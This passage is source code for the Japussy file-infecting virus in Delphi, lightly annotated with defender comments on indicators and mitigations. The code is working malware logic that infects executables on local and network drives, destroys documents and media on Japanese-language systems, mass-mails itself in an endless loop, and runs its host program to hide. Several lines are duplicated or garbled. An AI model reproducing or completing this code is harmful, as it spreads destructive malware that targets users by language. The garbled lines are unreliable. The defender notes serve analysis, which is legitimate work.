except
end;
end;
{Build the string of drive letters that the scan loop will walk.
 The original comment calls these "writable" drives, but the code below
 filters on drive type only.}
functionGetDrives:string;

var
DiskType:Word;
D:Char;
Str:string;
i:Integer;
begin
fori:=0to25do//iterate over the 26 drive letters
begin
D:=Chr(i+65);
Str:=D+':\';
DiskType:=GetDriveType(PChar(Str));
//keep local fixed disks and network drives
//NOTE(defender): DRIVE_REMOTE puts mapped network shares in scope, so the
//blast radius of one infected workstation includes every share it has a
//drive letter for; restrict write access on shares accordingly
if(DiskType=DRIVE_FIXED)or(DiskType=DRIVE_REMOTE)then
Result:=Result+D;
end;
end;
{Walk one directory, act on each file by extension, then recurse into
 subdirectories (original comment: traverse directories, infect and destroy files).
 Per entry: .EXE/.SCR go to InfectOneFile; HTML/ASP and address-book
 extensions are empty stubs in this listing; when IsJap is set, the listed
 document/media/archive extensions go to SmashFile.
 InfectOneFile, SmashFile and IsJap are declared outside this view.
 NOTE(defender): the observable pattern is one process enumerating every
 directory and opening executables for writing. File-integrity monitoring
 on executables and application allow-listing address the infection path;
 offline or versioned backups are the recovery path for the SmashFile branch.
 Several lines below are extraction-damaged (duplicated fragments, stray
 full-width punctuation) and are left exactly as found.}
procedureLoopFiles(Path,Mask:string);
var
i,Count:Integer;
Fn,Ext:string;
SubDir:TStrings;
SearchRec:TSearchRec;
Msg:TMsg;
{Classify a search record: 0 = not a directory, 1 = real subdirectory,
 2 = everything else (the else branch).}
functionIsValidDir(SearchRec:TSearchRec):Integer;
begin
if (searchrec.attr <> 16) and (searchrec.name <> ''''''''''''''''.'''''''''''''''') and。if (searchrec.attr <> 16) and (searchrec.name <> '.') and。if (searchrec.attr <> 16) and (searchrec.name <> '.')and。
(SearchRec.Name<>'..')then
Result:=0//not a directory
elseif(searchrec.attr=16)and(searchrec.name<>'.')and。elseif(searchrec.attr=16)and(searchrec.name<>'。if (searchrec.attr <> 16) and (searchrec.name <> '.')and。
(SearchRec.Name<>'..')then
Result:=1//a directory other than the dot entries (original comment: not the root directory)
elseResult:=2;//the remaining case (original comment: is the root directory)
end;
begin
if(FindFirst(Path+Mask,faAnyFile,SearchRec)=0)then
begin
repeat
PeekMessage(Msg,0,0,0,PM_REMOVE);//pump the message queue (author intent: avoid arousing suspicion)
ifIsValidDir(SearchRec)=0then
begin
Fn:=Path+SearchRec.Name;
Ext:=UpperCase(ExtractFileExt(Fn));
if(Ext='.EXE')or(Ext='.SCR')then
begin
InfectOneFile(Fn);//infect the executable file
end
else if (ext = '.htm') or (ext = '.html') or (ext = '.asp') then。else if (ext = '.htm') or (ext = '.html') or (ext = '.asp')then。else if (ext = ''''''''''''''''.htm'''''''''''''''') or (ext = ''''''''''''''''.html'''''''''''''''') or (ext = ''''''''''''''''.asp'''''''''''''''') then。
begin
//intended: infect HTML and ASP files by writing in a Base64-encoded copy of the virus,
//so that users who browse the page are exposed
//not implemented in this listing (original comment invites a reader to finish it)
end
elseifExt='.WAB'then//Outlook address book file
begin
//intended: collect Outlook mail addresses (empty stub)
end
elseifExt='.ADC'then//Foxmail address auto-complete file
begin
//intended: collect Foxmail mail addresses (empty stub)
end
elseifExt='IND'then//Foxmail address book file
begin
//intended: collect Foxmail mail addresses (empty stub)
end
else
begin
ifIsJapthen//Japanese-language operating system (flag set in InfectFiles)

begin
if(Ext='.DOC')or(Ext='.XLS')or(Ext='.MDB')or
(Ext='.MP3')or(Ext='.RM')or(Ext='.RA')or
(Ext='.WMA')or(Ext='.ZIP')or(Ext='.RAR')or
(Ext='.MPEG')or(Ext='.ASF')or(Ext='.JPG')or
(Ext='.JPEG')or(Ext='.GIF')or(Ext='.SWF')or
(Ext='.PDF')or(Ext='.CHM')or(Ext='.AVI')then
SmashFile(Fn);//destroy the file
end;
end;
end;
//sleep 200 ms after each file so CPU usage stays low (author intent: avoid suspicion)
//NOTE(defender): CPU-usage alerting will not flag this; watch file-write patterns instead
Sleep(200);
until(FindNext(SearchRec)<>0);
end;
FindClose(SearchRec);
//second pass: collect subdirectory names, then recurse into each
SubDir:=TStringList.Create;
if(FindFirst(Path+'*.*',faDirectory,SearchRec)=0)then
begin
repeat
ifIsValidDir(SearchRec)=1then
SubDir.Add(SearchRec.Name);
until(FindNext(SearchRec)<>0);
end;
FindClose(SearchRec);
Count:=SubDir.Count-1;
fori:=0toCountdo
LoopFiles(Path+SubDir.Strings+'\',Mask);
FreeAndNil(SubDir);
end;
{Top-level scan loop: walk every drive returned by GetDrives, call SendMail,
 sleep five minutes, repeat forever (original comment: traverse all files on disk).
 SendMail and IsJap are declared outside this view.
 NOTE(defender): the destructive branch is gated on the system code page,
 so dynamic analysis on a host whose ANSI code page is not 932 will only
 show the infection path; the fixed five-minute cycle is a usable
 behavioural marker.}
procedureInfectFiles;
var
DriverList:string;
i,Len:Integer;
begin
ifGetACP=932then//ANSI code page 932, i.e. a Japanese-language system
IsJap:=True;//enables the destructive branch in LoopFiles (original comment is a hostile remark)
DriverList:=GetDrives;//drive letter list (original comment: writable disks)
Len:=Length(DriverList);
whileTruedo//endless loop
begin
fori:=Lendownto1do//visit each disk drive
LoopFiles(DriverList+':\','*.*');//infect it
SendMail;//send mail carrying the virus
Sleep(1000*60*5);//sleep five minutes
end;
end;
{Program entry point. Two modes, chosen by the name of the running image:
 as Japussy.exe it goes straight to InfectFiles; otherwise it is running
 from inside an infected host, so it extracts the host program to a sibling
 file, launches it, then calls InfectFiles.
 IsWin9x, TmpFile, Si, Pi, ExtractFile and FillStartupInfo are declared
 outside this view.
 NOTE(defender): indicators visible in this block are the image name
 Japussy.exe and a sibling file whose name has a space before the .exe
 extension, created next to an executable and then run as a child process.
 The CreateProcess line is extraction-damaged and is left exactly as found.}
begin
ifIsWin9xthen//running on Win9x
RegisterServiceProcess(GetCurrentProcessID,1)//register as a service process
else//WinNT
begin
//intended: remote-thread injection into the Explorer process
//not implemented in this listing (original comment invites a reader to finish it)
end;
//if this is the original virus body itself
ifCompareText(ExtractFileName(ParamStr(0)),'Japussy.exe')=0then
InfectFiles//infect and send mail
else//already attached to a host program, start working
begin
TmpFile:=ParamStr(0);//start from the path of the running image (original comment: create temporary file)
Delete(TmpFile,Length(TmpFile)-4,4);
TmpFile:=TmpFile+#32+'.exe';//name for the real host file, with one extra space
ExtractFile(TmpFile);//split the host out
FillStartupInfo(Si,SW_SHOWDEFAULT);
createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,。createprocess(pchar(tmpfile),pchar(tmpfile),nil,nil,true,。createprocess(pchar(tmpfile), pchar(tmpfile), nil, nil, true,。
0,nil,'.',Si,Pi);//create a new process to run it
InfectFiles;//infect and send mail
end;
end.